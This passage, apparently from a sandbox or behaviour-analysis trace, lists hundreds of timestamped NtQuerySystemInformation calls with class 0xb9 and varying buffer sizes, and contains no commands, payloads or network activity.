ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0c0, Length=0x28, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0280.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0280.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0280.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0280.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.790] 